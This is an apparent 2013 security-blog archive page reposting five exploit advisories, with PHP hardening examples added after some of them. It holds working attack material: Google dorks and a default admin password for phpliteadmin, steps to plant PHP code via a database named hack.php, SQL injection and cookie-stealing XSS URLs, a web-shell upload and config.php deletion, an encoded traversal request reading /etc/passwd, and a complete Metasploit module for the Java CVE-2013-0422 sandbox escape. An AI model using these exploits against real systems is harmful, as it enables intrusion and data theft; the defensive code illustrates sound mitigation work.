Archive for 14 January 2013

phpliteadmin 1.9.3 Remote PHP Code Injection Vulnerability

A remote PHP code execution vulnerability has been found in phpliteadmin 1.9.3. The discoverer's notes on where the vulnerability lies and how it is used are as follows:


# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux

Description:

phpliteadmin.php#1784: 'Creating a New Database' => phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An attacker can create a SQLite database with a .php extension and insert PHP code as text fields. When done, the attacker can execute it simply by accessing the database file with the web browser.

Proof of Concept:

1. We create a db named "hack.php". (Depending on server configuration, sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".) The script will store the SQLite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ

2. Now create a new table in this database and insert a text field with the default value: <?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ

3. Now we run hack.php

Done!

Proof: http://goo.gl/ZqPVL
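The root cause above is a user-controlled file name that ends up under the web root with an attacker-chosen extension. The following is an added example, not phpliteadmin's own code, of how a database name can be validated before the file is created: only a plain base name is kept, the extension is restricted to the SQLite ones the help text lists, and the file is refused when the storage directory lies inside the document root. The constant, the function names and the `$directory`/`$documentRoot` parameters are assumptions for illustration.

```php
<?php
// Added example, not part of phpliteadmin: validate a user-supplied database
// name before creating the file. Names, constants and the directory handling
// are assumptions for illustration.
declare(strict_types=1);

// Extensions the help text itself calls "appropriate".
const ALLOWED_DB_EXTENSIONS = ['db', 'db3', 'sqlite', 'sqlite3'];

/**
 * Return a safe file name for a new database, or null when the input is rejected.
 *  - any directory component is dropped (no "../", no absolute paths)
 *  - the extension must be on the allow-list ("hack.php" is refused)
 *  - the stem may not contain dots, so "hack.php.db3" is refused as well:
 *    some Apache setups hand multi-extension files to mod_php
 */
function safe_db_filename(string $userName): ?string
{
    $base = basename(trim($userName));
    if ($base === '' || $base === '.' || $base === '..') {
        return null;
    }

    $stem = $base;
    $ext  = 'db';                       // default when the user gives none
    $dot  = strrpos($base, '.');
    if ($dot !== false) {
        $candidate = strtolower(substr($base, $dot + 1));
        if (!in_array($candidate, ALLOWED_DB_EXTENSIONS, true)) {
            return null;
        }
        $ext  = $candidate;
        $stem = substr($base, 0, $dot);
    }

    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $stem)) {
        return null;
    }
    return $stem . '.' . $ext;
}

/**
 * Resolve the final path inside $directory, and refuse a $directory that lies
 * inside the web root: a database file that is not reachable over HTTP cannot
 * be executed by the web server, whatever its name.
 */
function database_target_path(string $userName, string $directory, string $documentRoot): ?string
{
    $file = safe_db_filename($userName);
    $dir  = realpath($directory);
    $root = realpath($documentRoot);
    if ($file === null || $dir === false || $root === false) {
        return null;
    }
    $rootPrefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($dir === $root || strncmp($dir . DIRECTORY_SEPARATOR, $rootPrefix, strlen($rootPrefix)) === 0) {
        return null;
    }
    return $dir . DIRECTORY_SEPARATOR . $file;
}

// Constructed inputs mirroring the advisory's steps.
foreach (['hack.php', 'hack.php.db3', '../hack.sqlite', 'events', 'events.SQLITE'] as $name) {
    printf("%-16s -> %s\n", $name, safe_db_filename($name) ?? 'rejected');
}
```

The name check alone is not sufficient on its own: the advisory's step 1 notes that renaming an existing database is a second path to the same file name, so the same validation has to run on rename as well, and keeping the storage directory outside the document root removes the execution primitive regardless of naming.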

Websitebaker Add-on Concert Calendar 2.1.4 Multiple Vulnerabilities

Vulnerabilities were found in Websitebaker Add-on Concert Calendar version 2.1.4. The discoverer's comments on where the vulnerabilities occur and how they are used are given below.


Advisory:  Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerability
Advisory ID:  SSCHADV2013-001
Author:   Stefan Schurtz
Affected Software: Successfully tested on Concert Calendar 2.1.4
Vendor URL:  http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37
Vendor Status:  informed

========================== Vulnerability Description ==========================

Websitebaker Add-on 'Concert Calendar 2.1.4' is prone to a XSS and SQLi vulnerability

========================== Vuln code ==========================

// view.php

if (isset($_GET['date'])) {
        $date = $_GET['date'];
}
.
.
.
// SQLi
$query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = '$section_id' && concert_date = '$date'"); // line 184

// XSS

echo " ".switch_date($date, $dateview)." "; // Zeile 176

========================== PoC-Exploit ==========================

// SQLi (magic_quotes = off)

<a href="http://[target]/wb/pages/addon.php?date=[SQLi">http://[target]/wb/pages/addon.php?date=[SQLi</a>]

// XSS

<a href="http://[target]/wb/pages/addon.php?date='&quot;><script>alert(document.cookie)</script">http://[target]/wb/pages/addon.php?date='"><script>alert(document.cookie)</script</a>>

========================== Solution ==========================

-

========================== Disclosure Timeline ==========================

01-Jan-2013 - developer informed

========================== Credits ==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

========================== References ==========================

<a href="http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37">http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37</a> <a href="http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt">http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt</a>

Free Blog 1.0 Multiple Vulnerabilities

Vulnerabilities were found in Free Blog version 1.0. The discoverer's details about the vulnerabilities are as follows:


# Free Blog 1.0 Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Free_Blog.txt
# Software Link: http://blog.sdnex.com/
# Tested: Ubuntu 12.04.1 LTS

Proof of concept:

Arbitrary File Upload Vulnerability

<a href="http://bastardlabs/blog_path/up.php">http://bastardlabs/blog_path/up.php</a>

Shell will be available here

<a href="http://bastardlabs/blog_path/log/images/shell.php">http://bastardlabs/blog_path/log/images/shell.php</a>


Arbitrary File Deletion Vulnerability

----------
<?php
if($_GET['del']){
    $id=$_GET['del'];
    unlink("./log/images/$id");
}
?>
----------

<a href="http://bastardlabs/blog_path/up.php?del=../../[file">http://bastardlabs/blog_path/up.php?del=../../[file</a>]    <a href="http://bastardlabs/blog_path/up.php?del=../../config.php">http://bastardlabs/blog_path/up.php?del=../../config.php</a>

------------------------------
My sweetheart http://www.photoshow.com/watch/rx9IX5ZS
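The deletion code passes `$_GET['del']` straight into `unlink()`, so every file the web server user may delete is reachable through `../`. As an added example, not Free Blog's code, the functions below confine deletions to the upload directory: the request value is reduced to its base name, both the directory and the target are resolved with `realpath()`, and the target must be a regular file whose canonical path lies inside the directory. The upload directory `./log/images` is the one on the page; the function names are illustrative, and the demonstration builds its own throw-away directory tree.

```php
<?php
// Added example, not Free Blog's code: delete only a regular file that really
// lives inside the upload directory. Function names are illustrative.
declare(strict_types=1);

/**
 * Resolve $userName to a file inside $uploadDir, or return null.
 * realpath() collapses "..", "." and symlinks, so the prefix comparison is
 * made on canonical paths rather than on whatever the client sent.
 */
function resolve_upload_for_deletion(string $uploadDir, string $userName): ?string
{
    $dir = realpath($uploadDir);
    if ($dir === false || !is_dir($dir)) {
        return null;
    }
    // Only the last path component is honoured: "../../config.php" becomes
    // "config.php", which then has to exist inside $dir to be accepted.
    $base = basename($userName);
    if ($base === '' || $base === '.' || $base === '..' || strpos($base, "\0") !== false) {
        return null;
    }
    $target = realpath($dir . DIRECTORY_SEPARATOR . $base);
    if ($target === false || !is_file($target)) {
        return null;
    }
    $prefix = $dir . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null; // a symlink inside the directory pointing outside it
    }
    return $target;
}

/** Safe replacement for the page's unlink("./log/images/$id"). */
function delete_upload(string $uploadDir, string $userName): bool
{
    $target = resolve_upload_for_deletion($uploadDir, $userName);
    return $target !== null && unlink($target);
}

// Self-contained demonstration on a temporary tree with constructed files.
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'upload_demo_' . bin2hex(random_bytes(4));
mkdir($tmp . '/log/images', 0700, true);
file_put_contents($tmp . '/config.php', '<?php // constructed stand-in for the real config');
file_put_contents($tmp . '/log/images/photo.jpg', 'constructed image bytes');

// The traversal attempt from the advisory is refused; a real upload is deleted.
foreach (['../../config.php', 'photo.jpg'] as $name) {
    printf("delete(%s): %s\n", $name, delete_upload($tmp . '/log/images', $name) ? 'deleted' : 'refused');
}
printf("config.php still present: %s\n", file_exists($tmp . '/config.php') ? 'yes' : 'no');

// Clean up the temporary tree.
unlink($tmp . '/config.php');
rmdir($tmp . '/log/images');
rmdir($tmp . '/log');
rmdir($tmp);
```

The same confinement applies to the upload side of `up.php`: a file written under `log/images` should get a server-chosen name and an allow-listed extension, and the directory should not be served with script execution enabled, so that even a successful upload cannot become the `shell.php` the advisory points at.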

Watson Management Console 4.11.2.G Directory Traversal Vulnerability

A directory traversal vulnerability was found in Watson Management Console 4.11.2.G. The discoverer's notes on the vulnerability are given below. The vulnerability allows /etc/passwd to be read remotely.


# Exploit Title: Watson Management Console Directory Traversal Vulnerability
# Google Dork: allintitle:Watson Management Console
# Contacted Vendor : 17/12/2012 as well as 31/12/2012 The Vendor Did Not Respond .
# Date: 1/2/2013
# Exploit Author: Dhruv Shah
# Vendor Homepage: http://www.schmid-telecom.com/
# Software Link: N/A
# Version: 441A800W0G (4.11.2.G)
# Platform:Hardware

Watson Management Console is a ( Watson SHDSL Router 2p 8xEthernet Tabletop )

It has been found that Watson Management Console is prone to a directory traversal vulnerability. The issue is due to the server's failure to properly validate user supplied http requests.

This issue may allow an attacker to escape the web server root directory and view any web server readable files. Information acquired by exploiting this issue may be used to aid further attacks against a vulnerable system.

<a href="http://www.example.com">http://www.example.com</a>

In Burp Suite proxy, or any HTTP request proxy that you use, edit the request parameter to:

GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd HTTP/1.1

--
Regards
Snypter a.k.a Dhruv Shah
http://blog.snypter.com
http://www.youtube.com/snypter
http://www.facebook.com/dhruvshahs
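The request above hides `..` behind percent-encoding (`%2E%2E`), which is why a check for the literal string misses it and why the server has to normalise after decoding rather than before. As an added example, not from the advisory, the code below shows that normalisation as a log-review script: it decodes percent-encoding until the path stops changing (a server decodes exactly once; a detector decodes repeatedly so that double-encoded variants surface too), treats backslashes as separators, walks the segments and flags any request that would climb above the root. It runs over a few constructed access-log lines in Common Log Format, one of which is the advisory's request.

```php
<?php
// Added example, not from the advisory: flag request paths that escape the
// web root, including percent-encoded and double-encoded forms.
// The access-log lines at the bottom are constructed for the demonstration.
declare(strict_types=1);

/** Decode percent-encoding repeatedly (bounded) so that %252E%252E also surfaces. */
function fully_decode(string $path): string
{
    for ($i = 0; $i < 5; $i++) {
        $decoded = rawurldecode($path);
        if ($decoded === $path) {
            break;
        }
        $path = $decoded;
    }
    return $path;
}

/**
 * True when the path, after decoding and normalisation, would climb above the
 * root at any point. "/img/../css" stays inside the root and is not flagged.
 */
function escapes_web_root(string $rawPath): bool
{
    $path  = str_replace('\\', '/', fully_decode($rawPath));
    $path  = strtok($path, '?') ?: '';           // ignore the query string
    $depth = 0;
    foreach (explode('/', $path) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..') {
            if (--$depth < 0) {
                return true;
            }
            continue;
        }
        $depth++;
    }
    return false;
}

/** Return the log lines whose request path escapes the root. */
function flag_traversal_requests(array $logLines): array
{
    $flagged = [];
    foreach ($logLines as $line) {
        // Common Log Format: ... "METHOD PATH HTTP/x.y" ...
        if (preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)
            && escapes_web_root($m[1])) {
            $flagged[] = $line;
        }
    }
    return $flagged;
}

// Constructed access-log lines; the second one is the advisory's request.
$sampleLog = [
    '192.0.2.10 - - [14/Jan/2013:10:00:01 +0200] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.20 - - [14/Jan/2013:10:00:05 +0200] "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd HTTP/1.1" 200 1684',
    '192.0.2.30 - - [14/Jan/2013:10:00:09 +0200] "GET /img/../css/site.css HTTP/1.1" 200 300',
    '192.0.2.40 - - [14/Jan/2013:10:00:12 +0200] "GET /%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0',
];

foreach (flag_traversal_requests($sampleLog) as $hit) {
    echo "traversal: $hit\n";
}
```

The depth counter is the part that matters: a fixed string match on `../` or `%2E%2E` misses encodings it does not list, while counting segments after decoding catches every spelling of the same walk upward. On the device side the fix is the same check applied to the decoded path before any file is opened, and a 200 response to such a request in the logs is the signal that the check is missing.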

Java Applet JMX Remote Code Execution

A Java Applet JMX remote code execution vulnerability was found. The vulnerability was found by Metasploit, and the exploit for it is below.


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Java Applet JMX Remote Code Execution',
      'Description'   => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java
        code outside of the sandbox as exploited in the wild in January of 2013. The
        vulnerability affects Java version 7u10 and earlier.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown', # Vulnerability discovery
          'egypt', # Metasploit module
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'CVE', '2013-0422' ],
          [ 'US-CERT-VU', '625617' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
          [ 'URL', 'http://pastebin.com/cUG2ayjh' ]  #Who authored the code on pastebin?  I can't read Russian :(
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end

  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")
    @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("B.class", @loader_class)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end

  end

  def generate_html
    html  = %Q|<html><head><title>Download</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end